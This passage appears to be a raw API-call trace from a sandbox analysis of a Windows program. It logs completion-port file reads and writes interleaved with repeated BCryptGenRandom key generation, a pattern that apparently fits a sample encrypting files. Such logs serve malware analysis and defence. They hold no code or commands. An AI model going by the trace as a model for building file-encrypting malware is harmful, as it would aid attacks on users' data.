lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.541] WriteFile (in: hFile=0x13e4, lpBuffer=0x3e3003c, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008) returned 0x0 [0101.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.556] WriteFile (in: hFile=0xcac, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0101.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.577] CloseHandle (hObject=0xcb0) returned 1 [0101.584] free (_Block=0x1ff1e60) [0101.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.601] ReadFile (in: hFile=0xca0, lpBuffer=0x3e700ac, nNumberOfBytesToRead=0x1b48, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70078 | out: lpBuffer=0x3e700ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70078) returned 1 [0101.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.652] WriteFile (in: hFile=0x13e4, lpBuffer=0x3e3003c, nNumberOfBytesToWrite=0x33d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30008) returned 0x0 [0101.653] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.674] ReadFile (in: hFile=0xcb4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x131e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.682] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.929] CloseHandle (hObject=0xcac) returned 1 [0101.933] free (_Block=0x3d70048) [0101.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.948] WriteFile (in: hFile=0xefc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.957] WriteFile (in: hFile=0xf00, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0101.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.972] ReadFile (in: hFile=0xcac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xc30, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0101.973] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0101.984] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0101.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.987] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0101.987] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.987] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.987] free (_Block=0x77d800) [0101.987] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.987] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.988] free (_Block=0x2071818) [0101.988] free (_Block=0x2071928) [0101.988] free (_Block=0x77d908) [0101.988] WriteFile (in: hFile=0xefc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.002] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0102.002] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.003] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0102.004] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0102.004] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0102.004] free (_Block=0x77d800) [0102.004] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0102.004] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0102.004] free (_Block=0x2071818) [0102.004] free (_Block=0x2071928) [0102.004] free (_Block=0x77d908) [0102.004] WriteFile (in: hFile=0xf00, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0102.004] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.023] CloseHandle (hObject=0xefc) returned 1 [0102.028] free (_Block=0x3ef0008) [0102.028] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.032] ReadFile (in: hFile=0xcac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x1634, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0102.033] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.034] CloseHandle (hObject=0xcac) returned 1 [0102.035] free (_Block=0x3d70048) [0102.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.041] CloseHandle (hObject=0xf00) returned 1 [0102.042] free (_Block=0x3db00b8) [0102.045] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.405] ReadFile (in: hFile=0xf04, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x5062, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0102.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.496] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0102.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.498] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.498] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0102.498] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.499] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.499] free (_Block=0x3df0008) [0102.499] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.499] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.499] free (_Block=0x3df0008) [0102.499] free (_Block=0x2071818) [0102.499] free (_Block=0x77d800) [0102.499] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.500] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.518] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0102.518] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.519] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0102.522] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0102.522] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0102.522] free (_Block=0x77d800) [0102.523] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0102.523] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0102.523] free (_Block=0x2071818) [0102.523] free (_Block=0x2071928) [0102.523] free (_Block=0x77d908) [0102.523] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0102.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.534] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0102.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0102.538] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0102.538] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0102.538] free (_Block=0x77d800) [0102.538] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0102.538] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0102.539] free (_Block=0x2071818) [0102.539] free (_Block=0x2071928) [0102.539] free (_Block=0x77d908) [0102.539] WriteFile (in: hFile=0x13c4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0102.539] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.547] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0102.547] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.548] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0102.548] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0102.548] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0102.548] free (_Block=0x77d800) [0102.548] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0102.548] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0102.549] free (_Block=0x2071818) [0102.549] free (_Block=0x2071928) [0102.549] free (_Block=0x77d908) [0102.549] WriteFile (in: hFile=0xf04, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0102.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.664] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0102.664] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.716] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0102.716] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.716] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0102.718] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0102.718] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0102.718] free (_Block=0x77d800) [0102.718] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0102.718] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0102.718] free (_Block=0x2071818) [0102.718] free (_Block=0x2071928) [0102.718] free (_Block=0x77d908) [0102.718] WriteFile (in: hFile=0xf00, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0102.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.747] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0102.747] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.748] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0102.748] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0102.748] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0102.748] free (_Block=0x77d800) [0102.748] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0102.748] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0102.749] free (_Block=0x2071818) [0102.749] free (_Block=0x2071928) [0102.749] free (_Block=0x77d908) [0102.749] WriteFile (in: hFile=0x13c8, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0102.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0102.752] CloseHandle (hObject=0xf04) returned 1 [0102.761] free (_Block=0x3df0008) [0102.761] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.303] WriteFile (in: hFile=0x13c8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0103.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.313] WriteFile (in: hFile=0x13b4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0103.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0103.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0103.327] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.327] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.327] free (_Block=0x77d800) [0103.327] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.327] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.328] free (_Block=0x2071818) [0103.328] free (_Block=0x2071928) [0103.328] free (_Block=0x77d908) [0103.328] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.341] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.342] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0103.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.343] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0103.343] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.343] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.343] free (_Block=0x77d800) [0103.343] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.343] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.344] free (_Block=0x2071818) [0103.344] free (_Block=0x2071928) [0103.344] free (_Block=0x77d908) [0103.344] WriteFile (in: hFile=0x13c8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0103.344] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0103.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.354] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0103.354] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.355] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0103.355] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.355] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.355] free (_Block=0x77d800) [0103.355] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.355] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.356] free (_Block=0x2071818) [0103.356] free (_Block=0x2071928) [0103.356] free (_Block=0x77d908) [0103.356] WriteFile (in: hFile=0x13b4, lpBuffer=0x3e7003c*, 